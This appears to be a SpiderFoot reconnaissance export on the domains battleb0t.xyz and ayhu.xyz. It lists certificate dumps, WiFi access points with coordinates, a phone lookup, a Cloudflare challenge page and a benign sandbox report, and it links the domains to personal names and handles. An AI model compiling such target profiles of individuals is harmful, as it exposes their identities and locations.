08:ff:f6:95:60:23:b0:46:27:ef:93:ef:4d:f6:79:b3:e9:0a:
ac:f4:de:50:2a:42:3b:da:18:19:58:2d:61:b7:37:20:e9:3b:
f5:7c:74:a7:93:0d:78:f1:3c:2a:a6:84:c3:18:9e:8b:ec:31:
f9:d9:89:02:c1:c6:3c:0b:ac:e1:92:95:ae:5d:e3:0b:08:0d:
f7:ed:0f:4c:8f:0b:db:e5:06:bb:72:05:39:49:bb:58:4f:45:
0e:5b:f1:2e:b2:4b:34:8d:39:4c:05:01:1d:fa:e6:54:8b:64:
f4:28:60:af:2e:58:5a:36:b5:b6:aa:f5:35:93:2e:0a:49:62:
7e:69:d1:23:ae:f4:b5:d9:24:e5:1b:c2:1d:26:18:4d:5e:6b:
93:96:3c:0b
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ssuhome (Net ID: 00:0C:41:BD:78:F1) | 39.0469, -77.4903 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATT3p3p8g9 (Net ID: 84:61:A0:CD:52:30) | 37.751, -97.822 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:8080 | 188.114.97.1 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Beens Gast (Net ID: 00:01:21:1C:17:A1) | 52.3759, 4.8975 |
| 2023-05-12 03:11:25 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'format': {u'international': u'+14806242505', u'local': u'(480) 624-2505'}, u'country': {u'prefix': u'+1', u'code': u'US', u'name': u'United States'}, u'phone': u'+14806242505', u'valid': True, u'location': u'Arizona', u'carrier': u'', u'type': u'unknown'} | +14806242505 |
| 2023-05-12 02:53:12 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | Cloudflare Inc. Cloudflare | panel.battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:50:55:6d:e5:64:92:a0:7f:d0:de:03:2b:af:77:c2:fc:fe
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: May 4 19:22:49 2023 GMT
Not After : Aug 2 19:22:48 2023 GMT
Subject: CN=nwapi2.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c4:56:92:fa:17:84:ee:f0:d0:57:46:44:1b:c0:
a4:14:29:10:a1:ef:73:a4:e7:64:f7:b5:e7:3f:b3:
66:76:75:96:94:eb:49:c3:b4:7b:98:99:f2:0f:53:
8b:0d:5d:a1:7d:07:f5:ec:33:33:f7:d8:24:d7:52:
d5:12:6d:a1:1f:e4:a6:4e:04:dc:3d:ec:3d:be:c0:
68:52:81:bd:0e:b0:f2:dc:e9:9e:c3:80:ab:29:55:
f9:1e:e7:5b:91:26:2d:a5:23:af:31:21:a7:26:77:
4d:22:98:0f:3c:48:92:7d:11:24:a2:2a:0b:37:5b:
b7:75:5d:9c:47:56:23:11:ea:1f:65:df:5a:99:2d:
b1:7c:34:88:13:dd:65:4f:a0:08:9d:d3:51:25:a6:
78:33:43:63:15:48:98:b7:c9:2d:ff:76:3d:7c:7e:
de:53:44:95:89:fa:a0:73:8e:18:62:72:8d:27:49:
aa:9c:1f:aa:7b:22:63:3f:e5:47:2d:46:e9:11:a7:
d9:be:31:17:58:ae:26:cb:94:ea:b8:74:2e:d5:e8:
97:bd:26:29:ad:75:15:d7:0b:3c:87:ec:7d:26:04:
ba:6b:7d:a6:11:27:4a:69:b1:b7:ca:99:b8:9d:ff:
7b:56:12:82:6a:1b:ca:28:1f:06:65:69:79:cd:93:
18:d1:f0:f1:97:01:54:01:52:f9:a4:bc:b1:5f:7f:
07:cd:e4:2b:75:9a:b4:04:a5:b3:96:5c:fa:5f:34:
4a:10:9c:af:38:59:33:75:87:74:42:bf:9b:c5:16:
68:7e:6e:ef:bf:b4:49:f4:b3:b2:df:03:0b:41:57:
bd:9d:b3:e1:0a:ab:4d:b6:f0:4f:0a:55:ab:67:0d:
47:01:8e:e0:df:09:34:38:59:4b:e4:b2:f9:93:a9:
14:cd:7f:e8:59:e4:10:fd:c1:6c:48:fa:be:99:2c:
29:f5:4b:bb:ec:4a:d6:b7:12:55:98:93:98:eb:47:
5c:a0:a4:28:64:3b:23:a2:ef:82:47:19:63:8d:bd:
5b:18:22:cf:f0:62:27:bf:ee:4a:28:c1:7c:e2:7b:
78:12:dd:d5:e8:7d:85:3e:1e:0f:49:a2:f3:4c:aa:
0d:2d:cc:58:f9:3e:e7:38:d6:30:4c:04:5a:18:cf:
9c:92:c9:94:e0:25:8d:f8:47:4e:48:b9:1f:15:b5:
e5:de:4b:35:84:12:32:49:2b:fa:a7:68:2a:1b:83:
d8:7f:e6:d9:7f:ca:74:5f:b4:c9:a0:67:b2:29:ff:
a2:1e:11:be:bc:99:7a:fb:44:7b:a4:fe:9c:6b:8f:
e3:20:e4:b7:4f:84:65:a3:c1:39:7b:b5:4f:1d:d0:
69:a0:23
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
CB:34:4D:A2:38:84:54:47:A0:B5:F7:DD:3C:83:22:CF:57:4A:1C:21
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi2.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : May 4 20:22:49.987 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:49:5B:22:9A:37:74:EC:B5:6B:BF:74:25:
03:BF:46:DC:18:51:D6:44:11:7B:BF:B6:5B:50:DD:1C:
8F:80:EF:3B:02:20:47:2A:69:10:84:9E:DC:B5:E3:E3:
85:D7:64:E9:81:E6:34:A8:3A:EE:7B:C1:B6:5E:40:1F:
80:29:DA:11:05:13
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : May 4 20:22:50.005 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:35:7C:BF:0E:AA:9D:74:86:07:D7:D4:AB:
F5:E1:40:37:B8:BB:7E:DB:39:8A:BE:E2:5C:03:30:30:
87:33:6B:95:02:20:09:90:FF:C6:9A:73:8C:96:C5:27:
7D:6B:43:B6:38:71:2C:A6:63:43:70:C3:FA:5D:5B:71:
98:69:EE:13:00:4E
Signature Algorithm: sha256WithRSAEncryption
85:ff:2d:f7:ea:a0:91:b7:ce:aa:d9:bb:80:7c:e2:3c:82:5e:
aa:e4:8e:68:39:36:38:9c:77:b6:ea:24:b5:71:a4:68:73:d2:
cb:e4:b6:6e:87:92:cd:60:f0:4b:fa:16:3c:67:67:24:50:45:
a7:67:96:84:cc:d3:58:c6:5e:dc:44:85:ed:d6:81:ec:7f:49:
41:4d:c5:ca:ca:aa:32:ad:d7:11:f7:39:7b:b0:7b:77:74:44:
f7:cb:92:93:e4:45:e9:c1:4b:22:0e:6a:87:26:da:2f:86:c9:
2f:7d:8a:b8:0e:fa:c8:7d:05:d7:2e:5e:0f:61:c0:b7:f9:d9:
51:31:63:4f:68:5d:de:cc:22:12:04:48:9b:ee:41:d8:a5:b1:
3c:80:9c:7b:d1:ae:a7:5b:ac:bf:bc:03:e4:36:bf:0d:18:f2:
3c:c8:4d:81:d8:71:4f:93:f8:89:4f:b8:cc:c6:d5:23:b9:6b:
01:1a:ea:aa:63:1c:40:bd:2f:59:0a:34:b7:be:8a:f1:7e:27:
85:d0:0e:96:7f:f0:0b:eb:18:35:77:95:6b:27:bf:9c:18:72:
58:89:63:0e:ed:84:1b:cb:e1:47:d4:7e:b0:01:ca:b1:c2:f0:
7c:b9:e4:20:fc:db:bd:c2:a6:6c:47:1a:fc:14:e6:86:84:df:
57:0b:c2:0b
| battleb0t.xyz |
| 2023-05-12 03:01:35 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.112): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/kappi_1.png | https://funny.battleb0t.xyz/ |
| 2023-05-12 02:56:56 | Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="o9rkiN63h_dC1MXH2ewnO9VeNInpcF4XTtlC3.Ope.M-1683860062-0-AdUguWWDLVlZxsWb6e1bnqomUGdvKH9Hr8OR9XhDVbWy_UNZDFZLD8-BRJaoUzBMnZ4MBtuUzqAf-y1NVIXFBZc2zpThNEMVcsemZ6G3H2y2RdwaGI22EiA1S326BJRlVE4Ae2G6hV1-y96EsTpLgRijeuFFSHz05y1jK0LMHQT6Yul8T61BIXmvzdMkcho4NRYjRqIaGwnrNt3GHyXHuLD9Kg0Z1PswrdZsR5u8cj9YNRG5tPHVjIwdXSU_H7FvumTVKSb2DSCVu7zno--l-x_ursgemNqA1Eu9esEfAcEZErO2ynNNPle4iy35Q-002AvCnrTStuzsV9WenG-kzkwfzH4Bgm9BgZjZ2SzceeiUvpx0VbFQ3pFatklpu5sVBuMECIKb-C35grQD9hIe5CnF2tIuq3LpSjTYWdY_G-taMdpge2EijRLIBI6Kfm3KCKgrmIm-M_kaOkhT6zwNZKrbtrmrwvHusBRZM8mDqXK6BGxQEYolgs9YfSL0l717dfEhPntRoL6ZMAEy83CFiWTndZ1SzKSh5MxSqRh8JYSn7-hlp9tzN-SB8T0mkCkP87rm0gHB2Nc1YNmJH6a6djf3APAwio8E6jQftS4RNyx5lSUUZ_BnFys-ZXFUzYbxVs_s5utzzMkEYOyUrEjMwlbzK1bmHQXnmHfBHDfW-9w0KMV_I2KXURlKdWp_aVGaYPgU9RQpOrOu5jXRwZ5WWo3nXJCoJubmH-xr5xweBUbZG-SrvNgarDFttshord388LcpI4vf_DPi5QAhha2ONgO4nEYcsvGjPWmE5gBNnwndanRmSOkYLNoIKdyVDvafFa_9wxBk6pKwvUGADjN1yYITiFNd4Av6OjiMF0eCD0B-rMcf1K_RyJAW0Q63e569MyoALgsa5LuF6A9Fao0NuRtVokTtKXFjE683wyQoxz2rVadCdcz1SAkPujj4gsPBtzmyTzaZ0eAhZEu4ZktRZ3yW_kCzFaoZlWWXPLmMSYOISs0fLmCihg46UN9oyRLijuEDM_jHg4LTV2TnCzG6rH5ukfU2q3hIf7DNVmpydIO4964Rwd7yky69HogBFyvVcLvLJiau__mlfv9Zd8rpuWQeyviCGIKTRzsIwfkMqNPNyw8X9ilDjYLz8Er-YKFTiBYzKowqSDcLfsInmyu-GY3Q4CRe6azk1q2PDI5jsKPqVXZnDO6xM5WOgDfsUs8jCGX-Y7pnubkolyphepCOCRuJYkPER9RlRKn9TP1Iu5pT3zvM--Qn_g2xND5bfgguBbZ7_xzC6vrG4uq7pRN86Jyn1eh0aJoS1o3moXbGaKVZMFxn9St9eHP_LBzqatvidcntyoQnZyEuvoBGzmB7bxsXvanE_k1kK-flL0DxtFCoSL_hYsi2QdekeHyb0moJOnxYk8nOvpGRVJW2aeFOS6zzQYrTf1ZYVM7iyRgHYPN8uylozJaFR27equ7FqddcsitgcuSFaFlYteDEO4eAuImRVXD5QnWHTDDLK-J-a7cd7n5pHrzsbNbpwPeit55PzKCpzI484EAksVFlNAkrwC4SqRB6KhjvHJRu2SsinDAvuebN5jt7N0scno6aUyjSzxwSSpVf6bZrrSm-p-5sQDUjLp64NRXWVN8wvA3_1f2gF_Vosd3y9Sp0fSOsU2F6EIdZdWuHYetxrmSNE6AHJ3RT_C04YBvG6_Q9PkJsb86B49AEElj23DQaHfl1GA9qGlbppJY5scudrsxneqxrD58hLbvdzxrWwdzLczRciePhFl8OKW5eaSkWmK-s65YIEnBLOSnaXmYwPzvjg8f67iFNC-e3l5m0MDQVx52PRj2vf8DWG_AfPmw2afbxcw9ppplZ9oiixK20YnEv54WswcS_oGpXEwjRNaflmeY-Y06FMexN5UEccQFy7OcRAYdF-UVs7RwoJUdks1JoRoK9OtuCZ-KgdWRayYvkrBZh1irLAwBozTjJSzJVowS3-M9iXqAD-o4GZBMK9eAUQlmuEIIQAf4f1TCN4loJA-4yETDBP4eorxfgJm9hdR63VxYMIHAkqccOTphwj01rk_8nG1uU4rJrScaAyK8AS_kQ2UytoRgp8VoNR_d7rmE_GZgpIDjlZ7mYr5nvR22Zau-p4gmFaOvdsk2jjUaqisfuqgg6D7ilZ29ja7S9UD52x-HqjxmP4JRdKMs3zwtM2aBKs0yMaMXiLr0T0j3f1FktvbG7soBZaonR97fM1qjr28AlqpELx3WuIvTiKLBZ2gxE_Tjenn0-IC2XQdN8IEIXfw9F7jVJZ6FyGJ9Yx4YqJ3kmX0qXi9iX1jb-Y3YZwJ6j4tTSRr8_tAhbW33UaKc3ULwKwGZ9g9Ru0mgnq0hVusSVy31FLGpM6QZZ4iZhokIoEs5L-lSF6-Qt-6-GQgAAhgrRM_mFp17cJjzl0kVV9PTe5Y-EYxGWlJKX7FVEGARcAfwWh_GITW_xYClIpKaR9CMUgzm4MqfOkVCd-6Z7AHBczBYiCIlRejFdx7yIdIPo__-pVcOwTW-jE9Y6Ncj1gf1h">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TOYbkC9rgCOmr8G89iiZTp2nx3xahTKUWPvvRReOro8JJJL4fq23OOGaFt6uHWiVLv9ABlTzh5akOOr2iBc53fzTOjW4K5sc+Aw6LUirtlJizLJHy/2vFLg/egZuLvz4Jk1sjjx3a/wkUOpJytZhNSfbkgf1KJELFbBUDkPz+PDulg0Nr57X1+oFwk+MMf/JnTKFf63zzoaJCmg1UGm5a8QRiSNvGBM7/i8bWTpF39rRrej+fONG8+Xfj87ptGWoEpG+c7Okgjh50kVvVQ1MM2KNt9Wf0uYN3Y5L83KgO0XjOeom2ZbKiTxcFZ+mcfEnOH7y4gawPSo1rxstuxKlhzZzfeOfN4VyUmxDs0BnYa2jrym4m5FzCmfrBBJJ1wCoAVXGMuoymG/pQ4+/22Y5ByC1Z8p7u74Rp83gpUfEv8bmNvjC33vYku3SIvYOYc5AdNT18IswGxpIjLbRTT8QLo1fadzodr50qCzr5X5Vi06KH6SQu3sOWSfwXNxLiQrSqFvCVjlirKim8KagkYwrflhXda6MuRH8Nh6ZQFP87/eO2YkXCpF9UX1MgEu6CzGx',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:44:03 | Domain Name | No | SpiderFoot UI | 25 | 0 | 0 | 0 | None | ayhu.xyz | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:54:04 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://sharedresearch.jp/signup', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ad4_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ad4_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ad4_IESQMMUTEX_0_331"\n "IsoScope_ad4_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_ad4_ConnHashTable<2772>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_ad4_IE_EarlyTabStart_0xbf4_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2772"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"63.32.161.232:443"\n "142.251.46.234:443"\n "185.199.109.153:443"\n "142.250.189.227:443"\n "35.201.112.186:443"\n "20.125.62.241:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"edge.fullstory.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2021 Twitter, Inc." (Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB9A5.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB993.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabB992.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB992.tmp]- [targetUID: 00000000-00003572]\n "CabB9A4.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB9A4.tmp]- [targetUID: 00000000-00003572]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "-F6pfjtqLzI2JPCgQBnw7HFQQi8q0Q_1_.woff" has type "Web Open Font Format CFF length 4065724 version 1.1"- [targetUID: N/A]\n "-F6pfjtqLzI2JPCgQBnw7HFQMisq0Q_1_.woff" has type "Web Open Font Format CFF length 3887056 version 1.1"- [targetUID: N/A]\n "-F62fjtqLzI2JPCgQBnw7HFoxQ_1_.woff" has type "Web Open Font Format CFF length 3838836 version 1.1"- [targetUID: N/A]\n "-F6pfjtqLzI2JPCgQBnw7HFQaioq0Q_1_.woff" has type "Web Open Font Format CFF length 3740384 version 1.1"- [targetUID: N/A]\n "574_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "main_1_.js" has type "UTF-8 Unicode text with very long lines with no line terminators"- [targetUID: N/A]\n "main.19b1e1b5c433a7ed95e8_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "TarB9A5.tmp" has type "data"- Location: [%TEMP%\\TarB9A5.tmp]- [targetUID: 00000000-00003572]\n "signup_1_.htm" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "urlref_httpssharedresearch.jpsignup" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "CabB992.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB992.tmp]- [targetUID: 00000000-00003572]\n "clarity_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\js9ur7b\\imagestore.dat]- [targetUID: 00000000-00003572]\n "favicon_6_.ico" has type "MS Windows icon resource - 4 icons 16x16 32 bits/pixel 32x32 32 bits/pixel"- [targetUID: N/A]\n "92zPtBhPNqw79Ij1E865zBUv7mx9IgVF_1_.woff" has type "Web Open Font Format TrueType length 26112 version 1.1"- [targetUID: N/A]\n "92zPtBhPNqw79Ij1E865zBUv7myRJQVF_1_.woff" has type "Web Open Font Format TrueType length 25980 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://sharedresearch.jp/signup"\n Pattern match: "https://sharedresearch.jp"\n Pattern match: "https://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mz9JQVF.woff"\n Pattern match: "https://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myjJQVF.woff"\n Pattern match: "https://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7myRJQVF.woff"\n Pattern match: "https://fonts.gstatic.com/s/jost/v14/92zPtBhPNqw79Ij1E865zBUv7mx9IgVF.woff"\n Pattern match: "MUIDB3901E857A0CA662738CBFA56A18667BBieonline.microsoft.com/9216107971059231103373413687355431024901*"\n Pattern match: "IESS4Abing.com/102421882214431085611146495771230938743*SRCHUIDV=2&GUID=9D4CEE7CEDDE416B9F68E0235F2310E7&dmnchg=1bing.com/102421882214431085611146495771230938743*SRCHUSRDOB=20220131&T=1643622690000bing.com/1088129326617631085594154050458730938743*MUID21B72F"\n Pattern match: "https://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQaioq0Q.woff"\n Pattern match: "https://fonts.gstatic.com/s/notosansjp/v42/-F62fjtqLzI2JPCgQBnw7HFoxQ.woff"\n Pattern match: "https://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQMisq0Q.woff"\n Pattern match: "MUID3901E857A0CA662738CBFA56A18667BBmicrosoft.com/1025411295705631056689247978600330978218*SRCHDAF=NOFORMmicrosoft.com/1024194638604831125287247978600330978218*SRCHUIDV=2&GUID=A9F735962E2A42C3AFD3CAEB5B5F826B&dmnchg=1microsoft.com/1024194638604831125287247"\n Pattern match: "MUID21B72F426D186C1726273DAB6C9C6D7Eclarity.ms/214748467358971059231103373325406105431024901*"\n Pattern match: "https://fonts.googleapis.com/css2?family=Noto+Sans+JP:wght@300;400;500;900&display=swap"\n Pattern match: "https://fonts.googleapis.com/css2?family=Jost:wght@300;400;500;600&display=swap"\n Pattern match: "https://rsms.me/inter/inter.css"\n Pattern match: "https://fonts.googleapis.com/css2?family=Noto+Sans+JP:wght@300;400;500;600&display=swap"\n Pattern match: "https://fonts.googleapis.com/css2?family=Jost:wght@300;400;600&display=swap"\n Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Heuristic match: "edge.fullstory.com"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "edge.fullstory.com/s/fs.js"\n Pattern match: "https://\'+_fs_script"\n Pattern match: "https://www.clarity.ms/tag/+i"\n Pattern match: ".bing.com/214748467358971059231103373325359230431024901*MR0c.bing.com/2147484673293496550431026326325359230431024901*"\n Pattern match: "MR0c.clarity.ms/2147484673293496550431026326325406105431024901*ANONCHK0c.clarity.ms/2147484673395395097631024919325421730431024901*"\n Pattern match: "https://fonts.gstatic.com/s/notosansjp/v42/-F6pfjtqLzI2JPCgQBnw7HFQQi8q0Q.woff"\n Pattern match: "https://www.clarity.ms/eus2-c-sc/s/0.7.6/clarity.js,(y=l.getElementsByTagName(r)[0]).parentNode.insertBefore(t,y),a[c](start,i),a[c].q.unshift"\n 